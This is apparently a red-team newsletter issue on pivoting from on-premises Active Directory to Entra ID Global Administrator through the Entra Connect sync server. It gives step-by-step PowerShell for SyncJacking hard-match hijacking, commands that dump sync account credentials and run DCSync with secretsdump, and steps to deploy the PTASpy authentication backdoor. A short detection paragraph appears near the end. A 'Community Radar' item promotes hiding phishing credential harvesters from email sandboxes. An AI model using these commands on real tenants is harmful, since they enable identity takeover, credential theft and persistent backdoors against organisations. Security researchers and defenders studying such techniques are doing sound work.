SyncJacking: On-Prem AD to Cloud Admin

Table of contents

👋 Introduction

Hey everyone!

Last issue we covered OAuth Device Code Flow phishing, where attackers abuse cloud identity flows to bypass MFA from outside the perimeter. This week we go the other direction: attackers already inside the on-premises AD, pivoting straight to Entra ID Global Administrator without touching a cloud password reset.

Hybrid AD environments are the rule, not the exception. Most organizations running Microsoft 365 have Entra Connect installed somewhere on their network, quietly syncing identities between on-prem Active Directory and the cloud. That sync server is Tier-0 infrastructure. Compromise it and you own the bridge between both worlds.

This issue covers the SyncJacking technique, MSOL credential extraction, Pass-Through Authentication agent backdoors, the surviving sync API abuse paths, and the tooling that maps all of it.

Let’s get into it 👇

🏗️ Entra Connect Architecture: The Bridge You Need to Cross

Microsoft Entra Connect (formerly Azure AD Connect) runs as an on-premises service and maintains three key accounts attackers care about.

The AD DS Connector account (prefixed MSOL_ or AAD_) lives in your on-prem domain. It holds Replicate Directory Changes and Replicate Directory Changes All rights on the domain, which means DCSync. It also has GenericWrite over user objects for password writeback. If you’re working an on-prem engagement and see those rights in BloodHound, you found the sync account.

The Entra Connector account (also called the AAD Sync account) is the cloud-side identity. Historically, older deployments assigned it the Global Administrator role. Microsoft patched that in 2024, stripping the Directory Synchronization Accounts role down from 48 permissions to one. But the sync API still takes private calls, and the role still does things it shouldn’t.

The ADSync service account runs the sync process itself and holds the local SQL database credentials. Anything stored in that database, including service account passwords, is encrypted with DPAPI under the service account context, which means local admin on the sync server breaks it.

All three accounts feed into one attack surface. The sync server is a Tier-0 asset sitting on a domain member server, not a domain controller, often protected like a workstation.

🔍 Enumerating the Attack Surface

BloodHound with AzureHound data shows you the path. After collecting from both your on-prem AD and the Entra tenant, look for the SyncToEntra and AZAddMembers edges in the attack graph.

# AzureHound collection
./azurehound -u "[email protected]" -p "password" list --tenant "tenant.onmicrosoft.com" -o output.json

# Import into BloodHound CE, then query:
# MATCH p=(n)-[:SyncedToEntraUser]->(m) RETURN p

From within the domain, find the MSOL account directly. Its description field often contains the server name:

# Find MSOL/AAD accounts by name pattern
Get-ADUser -Filter {SamAccountName -like "MSOL_*" -or SamAccountName -like "AAD_*"} -Properties Description, MemberOf

# Check for DCSync rights (Replicate Directory Changes)
(Get-ACL "AD:\DC=corp,DC=local").Access | Where-Object {
    $_.ActiveDirectoryRights -match "ExtendedRight" -and
    $_.IdentityReference -match "MSOL"
}

Once you identify the sync server (the MSOL description usually contains the hostname), check whether you can reach port 1433 locally or via lateral movement. That SQL instance is the credential store.

💥 SyncJacking: Hard Match Hijacking to Global Admin

SyncJacking, published by Semperis in January 2026, abuses how Entra Connect matches on-prem accounts to cloud identities during synchronization.

Hard matching uses the mS-DS-ConsistencyGuid attribute (newer deployments) or objectGUID (older) as an immutable anchor. When Entra Connect syncs an object, it looks up the cloud identity with a matching ImmutableID. The cloud ImmutableID is the base64-encoded on-prem GUID. Whoever controls that attribute controls which cloud identity the on-prem account maps to.

The attack requires write access to an unsynchronized on-prem account and delete access to the target synchronized account. Both are low-privilege operations in a typical domain.

# Step 1: Copy the target's mS-DS-ConsistencyGuid to your controlled account
$target = Get-ADUser "GlobalAdmin" -Properties mS-DS-ConsistencyGuid, UserPrincipalName
$attacker = Get-ADUser "LowPrivUser"

# Copy the consistency GUID
Set-ADUser $attacker -Replace @{"mS-DS-ConsistencyGuid" = $target.mS-DS-ConsistencyGuid}

# Step 2: Copy the UPN (so the cloud finds your account by name)
Set-ADUser $attacker -UserPrincipalName $target.UserPrincipalName

# Step 3: Delete the original synchronized account
Remove-ADUser $target

# Step 4: Force a sync cycle
Import-Module ADSync
Start-ADSyncSyncCycle -PolicyType Delta

After the next sync, Entra Connect links your controlled account to the cloud identity that held the Global Administrator role. Authenticate to the cloud with your own password. You own the tenant.

Microsoft confirmed this as an Important privilege escalation vulnerability in May 2025. Enforcement-level hardening was planned for March 2026, with a hard enforcement date of July 1, 2026, blocking Entra Connect from modifying the OnPremisesObjectIdentifier attribute once a mapping exists. Environments running patched versions of Entra Connect have this blocked. Unpatched environments, and there are plenty, still expose the full attack.

Tenable’s follow-up research found that even after Microsoft’s 2024 hardening, the Directory Synchronization Accounts role continues to call the private sync API. That API allows password resets and user modifications against hybrid users without the permissions the portal enforces. The On Premises Directory Sync Account role, a newer undocumented variant, carries identical capabilities.

🗝️ MSOL Credential Extraction

If you land local admin on the Entra Connect server, credential extraction is a single tool invocation away.

# Using AADInternals
Import-Module AADInternals
Get-AADIntSyncCredentials

# Output: AD DS Connector account + Entra Connector account credentials in cleartext

AADInternals decrypts DPAPI-protected credentials from the ADSync local SQL database using the service account’s encryption keys. The AD DS Connector credentials give you DCSync rights against the entire domain. The Entra Connector credentials give you the sync API.

The Fox-IT adconnectdump.py tool provides a Python alternative, useful when PowerShell is restricted:

# Remote credential dump via RPC
python3 adconnectdump.py corp/localadmin:[email protected]

From there, a DCSync against the domain runs through Impacket:

python3 secretsdump.py -just-dc corp/MSOL_abc123:'ExtractedPassword'@dc.corp.local

This is the same DCSync technique from Issue 2’s Kerberos coverage applied through the sync account instead of a direct domain admin. The MSOL account is lower-visibility, often excluded from privileged account monitoring, and survives in compromised environments longer.

🕵️ Pass-Through Authentication Agent Backdoor

If the target uses Pass-Through Authentication instead of Password Hash Sync, a different attack path opens. PTA authenticates cloud logins by forwarding credentials to an on-prem agent, which validates them against AD.

With local admin on a PTA agent server, you can inject PTASpy into the agent process. The injected DLL hooks the ValidateCredentials function and forces it to return true for any credential, then logs every authentication attempt to disk.

# Using AADInternals PTA module
Import-Module AADInternals

# Extract the PTA agent certificate
Export-AADIntProxyAgentCertificates

# Export the bootstrap configuration to avoid IP change detection
Export-AADIntProxyAgentBootstraps

# Deploy the backdoor
.\Configure-PTASpy.ps1 -Certificate cert.pfx -Bootstrap bootstrap.xml

After deployment, every cloud authentication request that routes through this agent accepts any password. Credential harvest accumulates at C:\PTASpy\PTASpy.csv. The attacker can also authenticate as any synced user, including Global Administrators, with a blank password.

Microsoft recommended monitoring CAPI key access as a detection control. There are no PTA-specific event log entries. Defenders correlating on-prem AD authentication with Entra sign-in logs find discrepancies, but without definitive identifiers linking the two.

🛠️ Tools and Detection

For attack path discovery, AzureHound plus BloodHound Community Edition maps every Entra relationship into queryable graph data. Run AzureHound collection before you even touch the sync server.

ROADtools provides Python-based Entra enumeration and token manipulation. ROADrecon dumps all Azure AD objects into a local SQLite database with an Angular web interface for navigation. ROADtx handles token exchange, device registration, and PRT operations for post-exploitation.

# ROADrecon collection
pip install roadrecon
roadrecon auth -u [email protected] -p password
roadrecon gather
roadrecon gui  # Starts web interface at localhost:5000

AADInternals remains the primary PowerShell exploitation framework. The Get-AADIntSyncCredentials, Export-AADIntProxyAgentCertificates, and Set-AADIntUserPassword cmdlets cover the core attack primitives. Note that some AADInternals functions depending on the deprecated MSOnline module no longer work on modern tenants.

For detection: Entra sign-in logs with onPremisesSecurityIdentifier mismatch, changes to the mS-DS-ConsistencyGuid attribute on non-admin accounts in on-prem AD audit logs, and unexpected delta sync cycles are the primary indicators for SyncJacking. Treating the Entra Connect server as a Tier-0 asset with privileged access workstation controls eliminates most of these attack paths before exploitation.

📡 Community Radar

SpecterOps: Don’t Jump the Turnstile - Lessons from the Field

Published May 28, 2026. Zach Stein documents a red team engagement where email sandboxes blocked every phishing iteration, including user-agent filtering and mouse-movement detection. The fix was Cloudflare Turnstile deployed as a verification layer before the payload redirect. The sandbox sees CAPTCHA infrastructure and stops. Real users click through and reach the credential harvester. Detailed Flask implementation with Apache proxying, plus a GitHub repo with automation. If your phishing campaigns are getting flagged mid-engagement, this is worth reading before your next op.

🎯 Key Takeaways

The Entra Connect server is the most dangerous Tier-0 asset most organizations fail to protect like one. Domain member servers routinely have less endpoint detection, weaker PAM controls, and broader admin access than domain controllers. An attacker who can escalate to local admin on the sync server holds credentials for DCSync, cloud identity manipulation, and in PTA environments, an authentication backdoor. The AD enumeration techniques from Issue 19 apply directly to locating the sync server and the MSOL account.

SyncJacking is the highest-impact vector for environments still running unpatched Entra Connect. You need write access to any unsynchronized account and delete access to the target synchronized account, both of which are low-privilege AD operations. The result is Global Administrator in the cloud with minimal audit trail. Microsoft’s enforcement hardening was supposed to land in March 2026, now pushed to July 1, 2026. Every environment with Entra Connect below that enforcement version is still vulnerable to the full attack.

The sync API abuse path from Tenable’s research is the one that survives patching. Even after Microsoft stripped the Directory Synchronization Accounts role down to a single permission, the role’s private API access still allows password resets against hybrid users. This is the attack path that doesn’t require Entra Connect server access at all, just the sync account credentials. Treat those credentials with the same urgency as a krbtgt hash.

For tooling, use AzureHound plus BloodHound to map attack paths before engaging any exploitation. ROADrecon gives you a full tenant snapshot to identify privileged hybrid users and application permissions. AADInternals is the exploitation framework once you’re on the sync server. For engagements where the sync server is out of scope or unreachable, focus on the sync account directly: its on-prem ACL rights enable DCSync against the full domain, and those rights don’t require touching the sync server at all.

---

Practice:

• Semperis: SyncJacking - Hard Matching Vulnerability - original SyncJacking research by Tomer Nahum
• Tenable: Entra ID Synchronization Remains Open for Abuse - sync API abuse paths surviving Microsoft’s 2024 hardening
• ReverSec: Entra Connect Exploitation in 2025 Overview - practical feasibility assessment of each attack path
• AADInternals - Dr. Nestori Syynimaa - PowerShell exploitation framework for Entra ID
• ROADtools - dirkjanm - Azure AD/Entra enumeration and token manipulation
• AzureHound - BloodHoundAD - BloodHound collector for Entra attack path mapping
• Cloud-Architekt: AAD Sync Service Account Attack/Defense - comprehensive attack/defense reference
• Microsoft Entra Connect official docs - architecture reference for understanding what you’re targeting

---

Thanks for reading, and happy hunting!

— Ruben

Other Issues

Device Code Phishing: Stealing Tokens via Real Login

Previous Issue